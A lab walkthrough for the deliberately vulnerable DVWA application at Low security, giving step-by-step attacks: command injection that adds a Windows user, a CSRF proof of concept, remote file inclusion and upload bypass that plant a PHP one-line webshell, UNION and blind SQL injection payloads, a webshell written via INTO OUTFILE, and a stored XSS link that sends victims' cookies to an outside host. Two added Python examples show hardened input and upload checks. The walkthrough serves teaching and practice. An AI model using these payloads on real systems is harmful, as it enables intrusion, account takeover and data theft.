DVWA security level set to Low
1. Brute Force
Start Burp Suite and brute-force the password of the admin user (send the login request to Intruder with the password field as the payload position).

2. Command Injection
127.0.0.1 & net user zs 123 /add      (the & ends the ping command and runs a second one: creates local user zs with password 123)
127.0.0.1 & net user                  (lists local users to confirm the account was added)
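Why the `&` payload works and how the handler should have been written, as an added example (not code from the original notes or from DVWA). The vulnerable function mirrors DVWA's Low handler, which glues the user string onto a `ping` command and hands it to a shell; the hardened version validates the target as a literal IP address and passes it as a separate argv entry so no shell ever parses it. Function names are my own.

```python
import ipaddress
import platform
import subprocess


def vulnerable_ping_command(target: str) -> str:
    """Mirrors the DVWA Low handler: the user string is concatenated into a shell
    command string. '&' on cmd.exe (';', '&&', '|' on sh) ends the ping and starts a
    second, attacker-chosen command."""
    if platform.system() == "Windows":
        return "ping " + target          # DVWA runs this through shell_exec()
    return "ping -c 4 " + target


def is_valid_target(target: str) -> bool:
    """Allow-list check: accept only something ipaddress can parse as an IPv4/IPv6 address.
    Anything with a space, '&', ';' or '|' fails here before a command is even built."""
    try:
        ipaddress.ip_address(target.strip())
    except ValueError:
        return False
    return True


def hardened_ping_args(target: str) -> list[str]:
    """Validate, then return argv for subprocess with shell=False: the target is one
    argument to ping, so metacharacters would at most be an unresolvable host name."""
    if not is_valid_target(target):
        raise ValueError(f"refusing to ping {target!r}: not an IP address")
    target = target.strip()
    if platform.system() == "Windows":
        return ["ping", "-n", "4", target]
    return ["ping", "-c", "4", target]


def run_hardened_ping(target: str) -> str:
    # shell=False is the default: argv goes straight to the ping binary.
    proc = subprocess.run(hardened_ping_args(target), capture_output=True, text=True, timeout=30)
    return proc.stdout + proc.stderr


if __name__ == "__main__":
    payload = "127.0.0.1 & net user zs 123 /add"
    print("vulnerable command line:", vulnerable_ping_command(payload))
    try:
        run_hardened_ping(payload)
    except ValueError as err:
        print("hardened handler:", err)
    print(run_hardened_ping("127.0.0.1"))
```

Rejecting on validation failure is deliberate: a blacklist of `&`, `;` and `|` (what DVWA's Medium level does) still leaves newline, backtick and `$()` on sh, so the check is "is this an IP address", not "does this contain a bad character".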

3. CSRF (Cross-Site Request Forgery)
Start Burp, intercept the password-change request on the CSRF page, generate a CSRF PoC from it, write it to index.htm, and copy index.htm to c:\inetpub\wwwroot on a self-hosted server.
Lure the administrator who is currently logged in to the back end into visiting the index.htm page on your server; the browser sends the password-change request with the victim's own session cookie attached.

4. File Inclusion
Rename "创建一句话木马.txt" (a PHP file that writes a one-line webshell) to aa.txt and copy it to c:\inetpub\wwwroot on the self-hosted server.
On the DVWA File Inclusion page, include http://<self-hosted server IP>/aa.txt (remote file inclusion; the DVWA host needs allow_url_include=On for this to work). The included PHP runs on the DVWA host, so note the URL of the webshell it writes.
Start 过狗菜刀 (a China Chopper variant) and connect to the one-line webshell.

5. File Upload
Change the one-line webshell's extension to .jpg.
Intercept the upload with Burp Suite and change the filename in the multipart request back to .php (the server stores the file under the name in the request, not the name the browser showed).
Start 过狗菜刀 and connect to the one-line webshell at http://192.168.226.175/dvwa/hackable/uploads/aa.php
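The Burp rename works because nothing on the server re-checks the filename that actually arrives. The following is an added example (not from the original notes or from DVWA) of the server-side checks that would stop it: an extension allow-list applied to the final name in the request, a file-signature check on the content, and a random stored name so the attacker cannot guess the URL. UPLOAD_DIR and the function names are assumptions.

```python
import os
import secrets

UPLOAD_DIR = "/var/www/uploads"   # assumed path; serve it with script execution disabled

# Extension allow-list, each paired with the file signature(s) the content must start with.
MAGIC = {
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".gif": (b"GIF87a", b"GIF89a"),
}


def check_upload(client_filename: str, data: bytes) -> str:
    """Return a safe name to store the file under, or raise ValueError.

    The checks run on the filename as it arrives in the multipart body, so
    aa.jpg renamed to aa.php in an intercepted request is rejected, and so is
    aa.jpg.php (only the last extension counts).
    """
    base = os.path.basename(client_filename.replace("\\", "/"))   # drop any path component
    ext = os.path.splitext(base)[1].lower()
    if ext not in MAGIC:
        raise ValueError(f"extension {ext!r} is not allowed")
    if not any(data.startswith(sig) for sig in MAGIC[ext]):
        raise ValueError("file content does not match its extension")
    # A real JPEG with PHP hidden in a comment still passes the signature check; that is
    # why the stored extension stays in the allow-list and the directory must not execute
    # scripts. Never reuse the client's name: the random name also hides the URL.
    return secrets.token_hex(8) + ext


def save_upload(client_filename: str, data: bytes) -> str:
    """Validate and write the file; returns the path it was stored at."""
    name = check_upload(client_filename, data)
    path = os.path.join(UPLOAD_DIR, name)
    with open(path, "wb") as fh:
        fh.write(data)
    return path


if __name__ == "__main__":
    # Constructed sample inputs: a minimal JPEG header and the one-line webshell.
    jpeg = b"\xff\xd8\xff\xe0" + b"\x00" * 12
    shell = b'<?php @eval($_POST["pass"]); ?>'
    print("aa.jpg with JPEG bytes ->", check_upload("aa.jpg", jpeg))
    for name, body in (("aa.php", shell), ("aa.jpg", shell), ("aa.jpg.php", jpeg)):
        try:
            check_upload(name, body)
        except ValueError as err:
            print(f"{name}: rejected ({err})")
```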

6. Insecure CAPTCHA
(reCAPTCHA keys requested from Google and entered in the DVWA config:
6LdJJlUUAAAAAH1Q6cTpZRQ2Ah8VpyzhnffD0mBb
6LdJJlUUAAAAAM2a3HrgzLczqdYp4g05EqDs-W4K )
Intercept the password-change POST and change step=1 to step=2: the CAPTCHA is only verified in step 1, so the step-2 request changes the password without a valid CAPTCHA response.

7. SQL Injection
1' and '1'='1                                    (confirms the input lands in a quoted string)
1' order by 2 #                                  (2 works, 3 errors: the SELECT has two columns)
1' union select 1,database() #
1' union select 1,group_concat(table_name) from information_schema.tables where table_schema='dvwa' #
1' union select 1,group_concat(column_name) from information_schema.columns where table_name='users' #
1' union select user,password from users #


8. SQL Injection (Blind)

(? marks the value to iterate over; the page only answers "User ID exists" or "MISSING")
1' and length(database())=? #
1' and ascii(substr(database(),1,1))>100 #                  (binary-search each character's ASCII code)
1' and (select count(table_name) from information_schema.tables where table_schema=database())=? #
1' and length(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),1))=? #
1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),1,1))>103 #
1' and (select count(column_name) from information_schema.columns where table_name='users')=? #    (page shows "exists" when the guess is right)
1' and ascii(substr((select column_name from information_schema.columns where table_name='users' limit ?,1),1,1))>116 #    (? = column offset; locates the user column)

1' union select 1,'<?php @eval($_POST["pass"]) ?>' into outfile 'c:/wamp/www/dvwa/my.php' #
(needs the MySQL FILE privilege, a secure_file_priv setting that permits that directory, and a web root the MySQL service can write to)

9. Weak Session IDs
dvwaSession=3; security=low; PHPSESSID=
At Low the dvwaSession cookie is a counter that goes up by one each time Generate is clicked, so the next value (4) is predictable and can be set by hand in the browser.

10. XSS (DOM)
11. XSS (Reflected)
<script>alert(document.cookie);</script>
12. XSS (Stored)
<a href="javascript:;" onClick="javascript:window.open('http://192.168.226.151/8nm/cookie.php?cookie='+document.cookie);">zs </a>
Replace your own cookie with a collected victim cookie (in the browser's dev tools or in Burp) to skip authentication and access the victim's account.
